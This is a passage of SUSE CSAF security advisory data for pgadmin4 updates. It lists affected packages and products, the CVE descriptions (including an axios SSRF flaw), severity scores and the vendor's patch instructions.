"summary": "E-Mail link for SUSE-SU-2025:1227-1",
"url": "https://lists.suse.com/pipermail/sle-updates/2025-April/038971.html"
},
{
"category": "self",
"summary": "SUSE Bug 1239308",
"url": "https://bugzilla.suse.com/1239308"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-27152 page",
"url": "https://www.suse.com/security/cve/CVE-2025-27152/"
}
],
"title": "Security update for pgadmin4",
"tracking": {
"current_release_date": "2025-04-14T07:06:34Z",
"generator": {
"date": "2025-04-14T07:06:34Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2025:1227-1",
"initial_release_date": "2025-04-14T07:06:34Z",
"revision_history": [
{
"date": "2025-04-14T07:06:34Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-8.5-150600.3.9.1.noarch",
"product": {
"name": "pgadmin4-8.5-150600.3.9.1.noarch",
"product_id": "pgadmin4-8.5-150600.3.9.1.noarch"
}
},
{
"category": "product_version",
"name": "pgadmin4-cloud-8.5-150600.3.9.1.noarch",
"product": {
"name": "pgadmin4-cloud-8.5-150600.3.9.1.noarch",
"product_id": "pgadmin4-cloud-8.5-150600.3.9.1.noarch"
}
},
{
"category": "product_version",
"name": "pgadmin4-desktop-8.5-150600.3.9.1.noarch",
"product": {
"name": "pgadmin4-desktop-8.5-150600.3.9.1.noarch",
"product_id": "pgadmin4-desktop-8.5-150600.3.9.1.noarch"
}
},
{
"category": "product_version",
"name": "pgadmin4-doc-8.5-150600.3.9.1.noarch",
"product": {
"name": "pgadmin4-doc-8.5-150600.3.9.1.noarch",
"product_id": "pgadmin4-doc-8.5-150600.3.9.1.noarch"
}
},
{
"category": "product_version",
"name": "pgadmin4-web-uwsgi-8.5-150600.3.9.1.noarch",
"product": {
"name": "pgadmin4-web-uwsgi-8.5-150600.3.9.1.noarch",
"product_id": "pgadmin4-web-uwsgi-8.5-150600.3.9.1.noarch"
}
},
{
"category": "product_version",
"name": "system-user-pgadmin-8.5-150600.3.9.1.noarch",
"product": {
"name": "system-user-pgadmin-8.5-150600.3.9.1.noarch",
"product_id": "system-user-pgadmin-8.5-150600.3.9.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Module for Python 3 15 SP6",
"product": {
"name": "SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-python3:15:sp6"
}
}
},
{
"category": "product_name",
"name": "openSUSE Leap 15.6",
"product": {
"name": "openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:leap:15.6"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-8.5-150600.3.9.1.noarch as component of SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.9.1.noarch"
},
"product_reference": "pgadmin4-8.5-150600.3.9.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Python 3 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-8.5-150600.3.9.1.noarch as component of SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.9.1.noarch"
},
"product_reference": "pgadmin4-doc-8.5-150600.3.9.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Python 3 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "system-user-pgadmin-8.5-150600.3.9.1.noarch as component of SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.9.1.noarch"
},
"product_reference": "system-user-pgadmin-8.5-150600.3.9.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Python 3 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-8.5-150600.3.9.1.noarch as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:pgadmin4-8.5-150600.3.9.1.noarch"
},
"product_reference": "pgadmin4-8.5-150600.3.9.1.noarch",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-cloud-8.5-150600.3.9.1.noarch as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.9.1.noarch"
},
"product_reference": "pgadmin4-cloud-8.5-150600.3.9.1.noarch",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-desktop-8.5-150600.3.9.1.noarch as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.9.1.noarch"
},
"product_reference": "pgadmin4-desktop-8.5-150600.3.9.1.noarch",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-8.5-150600.3.9.1.noarch as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.9.1.noarch"
},
"product_reference": "pgadmin4-doc-8.5-150600.3.9.1.noarch",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-uwsgi-8.5-150600.3.9.1.noarch as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.9.1.noarch"
},
"product_reference": "pgadmin4-web-uwsgi-8.5-150600.3.9.1.noarch",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "system-user-pgadmin-8.5-150600.3.9.1.noarch as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.9.1.noarch"
},
"product_reference": "system-user-pgadmin-8.5-150600.3.9.1.noarch",
"relates_to_product_reference": "openSUSE Leap 15.6"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-27152",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-27152"
}
],
"notes": [
{
"category": "general",
"text": "axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if \u2060baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.9.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.9.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.9.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-27152",
"url": "https://www.suse.com/security/cve/CVE-2025-27152"
},
{
"category": "external",
"summary": "SUSE Bug 1239305 for CVE-2025-27152",
"url": "https://bugzilla.suse.com/1239305"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.9.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.9.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.9.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.9.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.9.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.9.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-04-14T07:06:34Z",
"details": "important"
}
],
"title": "CVE-2025-27152"
}
]
}
suse-su-2025:1326-1
Vulnerability from csaf_suse
Published
2025-04-16 08:37
Modified
2025-04-16 08:37
Summary
Security update for pgadmin4
Notes
Title of the patch
Security update for pgadmin4
Description of the patch
This update for pgadmin4 fixes the following issues:
- CVE-2025-27152: Fixed SSRF and creadential leakage due to requests sent to absolute URL even when baseURL is set (bsc#1239308)
- CVE-2023-1907: Fixed an issue which could result in users being authenticated in another user's session if two users authenticate simultaneously via ldap (bsc#1234840)
- CVE-2024-4068: Fixed a possible memory exhaustion (bsc#1224295)
Patchnames
SUSE-2025-1326,SUSE-SLE-Module-Python3-15-SP6-2025-1326,SUSE-SLE-Product-HPC-15-SP3-LTSS-2025-1326,SUSE-SLE-Product-HPC-15-SP4-ESPOS-2025-1326,SUSE-SLE-Product-HPC-15-SP4-LTSS-2025-1326,SUSE-SLE-Product-HPC-15-SP5-ESPOS-2025-1326,SUSE-SLE-Product-HPC-15-SP5-LTSS-2025-1326,SUSE-SLE-Product-SLES-15-SP3-LTSS-2025-1326,SUSE-SLE-Product-SLES-15-SP4-LTSS-2025-1326,SUSE-SLE-Product-SLES-15-SP5-LTSS-2025-1326,SUSE-SLE-Product-SLES_SAP-15-SP3-2025-1326,SUSE-SLE-Product-SLES_SAP-15-SP4-2025-1326,SUSE-SLE-Product-SLES_SAP-15-SP5-2025-1326,SUSE-SLE-Product-SUSE-Manager-Proxy-4.3-2025-1326,SUSE-SLE-Product-SUSE-Manager-Server-4.3-2025-1326,SUSE-Storage-7.1-2025-1326
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for pgadmin4",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for pgadmin4 fixes the following issues:\n\n- CVE-2025-27152: Fixed SSRF and creadential leakage due to requests sent to absolute URL even when baseURL is set (bsc#1239308)\n- CVE-2023-1907: Fixed an issue which could result in users being authenticated in another user\u0027s session if two users authenticate simultaneously via ldap (bsc#1234840)\n- CVE-2024-4068: Fixed a possible memory exhaustion (bsc#1224295)\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2025-1326,SUSE-SLE-Module-Python3-15-SP6-2025-1326,SUSE-SLE-Product-HPC-15-SP3-LTSS-2025-1326,SUSE-SLE-Product-HPC-15-SP4-ESPOS-2025-1326,SUSE-SLE-Product-HPC-15-SP4-LTSS-2025-1326,SUSE-SLE-Product-HPC-15-SP5-ESPOS-2025-1326,SUSE-SLE-Product-HPC-15-SP5-LTSS-2025-1326,SUSE-SLE-Product-SLES-15-SP3-LTSS-2025-1326,SUSE-SLE-Product-SLES-15-SP4-LTSS-2025-1326,SUSE-SLE-Product-SLES-15-SP5-LTSS-2025-1326,SUSE-SLE-Product-SLES_SAP-15-SP3-2025-1326,SUSE-SLE-Product-SLES_SAP-15-SP4-2025-1326,SUSE-SLE-Product-SLES_SAP-15-SP5-2025-1326,SUSE-SLE-Product-SUSE-Manager-Proxy-4.3-2025-1326,SUSE-SLE-Product-SUSE-Manager-Server-4.3-2025-1326,SUSE-Storage-7.1-2025-1326",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2025_1326-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2025:1326-1",
"url": "https://www.suse.com/support/update/announcement/2025/suse-su-20251326-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2025:1326-1",
"url": "https://lists.suse.com/pipermail/sle-updates/2025-April/039030.html"
},
{
"category": "self",
"summary": "SUSE Bug 1224295",
"url": "https://bugzilla.suse.com/1224295"
},
{
"category": "self",
"summary": "SUSE Bug 1234840",
"url": "https://bugzilla.suse.com/1234840"
},
{
"category": "self",
"summary": "SUSE Bug 1239308",
"url": "https://bugzilla.suse.com/1239308"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-1907 page",
"url": "https://www.suse.com/security/cve/CVE-2023-1907/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-4068 page",
"url": "https://www.suse.com/security/cve/CVE-2024-4068/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-27152 page",
"url": "https://www.suse.com/security/cve/CVE-2025-27152/"
}
],
"title": "Security update for pgadmin4",
"tracking": {
"current_release_date": "2025-04-16T08:37:10Z",
"generator": {
"date": "2025-04-16T08:37:10Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2025:1326-1",
"initial_release_date": "2025-04-16T08:37:10Z",
"revision_history": [
{
"date": "2025-04-16T08:37:10Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-4.30-150300.3.18.1.aarch64",
"product": {
"name": "pgadmin4-4.30-150300.3.18.1.aarch64",
"product_id": "pgadmin4-4.30-150300.3.18.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-4.30-150300.3.18.1.i586",
"product": {
"name": "pgadmin4-4.30-150300.3.18.1.i586",
"product_id": "pgadmin4-4.30-150300.3.18.1.i586"
}
}
],
"category": "architecture",
"name": "i586"
},
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"product": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"product_id": "pgadmin4-doc-4.30-150300.3.18.1.noarch"
}
},
{
"category": "product_version",
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"product": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"product_id": "pgadmin4-web-4.30-150300.3.18.1.noarch"
}
},
{
"category": "product_version",
"name": "pgadmin4-web-uwsgi-4.30-150300.3.18.1.noarch",
"product": {
"name": "pgadmin4-web-uwsgi-4.30-150300.3.18.1.noarch",
"product_id": "pgadmin4-web-uwsgi-4.30-150300.3.18.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-4.30-150300.3.18.1.ppc64le",
"product": {
"name": "pgadmin4-4.30-150300.3.18.1.ppc64le",
"product_id": "pgadmin4-4.30-150300.3.18.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-4.30-150300.3.18.1.s390x",
"product": {
"name": "pgadmin4-4.30-150300.3.18.1.s390x",
"product_id": "pgadmin4-4.30-150300.3.18.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-4.30-150300.3.18.1.x86_64",
"product": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64",
"product_id": "pgadmin4-4.30-150300.3.18.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Module for Python 3 15 SP6",
"product": {
"name": "SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-python3:15:sp6"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-ltss:15:sp3"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-espos:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-ltss:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-espos:15:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-ltss:15:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 15 SP3-LTSS",
"product": {
"name": "SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss:15:sp3"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 15 SP4-LTSS",
"product": {
"name": "SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 15 SP5-LTSS",
"product": {
"name": "SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss:15:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product": {
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles_sap:15:sp3"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product": {
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles_sap:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product": {
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles_sap:15:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Manager Proxy 4.3",
"product": {
"name": "SUSE Manager Proxy 4.3",
"product_id": "SUSE Manager Proxy 4.3",
"product_identification_helper": {
"cpe": "cpe:/o:suse:suse-manager-proxy:4.3"
}
}
},
{
"category": "product_name",
"name": "SUSE Manager Server 4.3",
"product": {
"name": "SUSE Manager Server 4.3",
"product_id": "SUSE Manager Server 4.3",
"product_identification_helper": {
"cpe": "cpe:/o:suse:suse-manager-server:4.3"
}
}
},
{
"category": "product_name",
"name": "SUSE Enterprise Storage 7.1",
"product": {
"name": "SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1",
"product_identification_helper": {
"cpe": "cpe:/o:suse:ses:7.1"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.s390x as component of SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Python 3 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Python 3 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Python 3 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
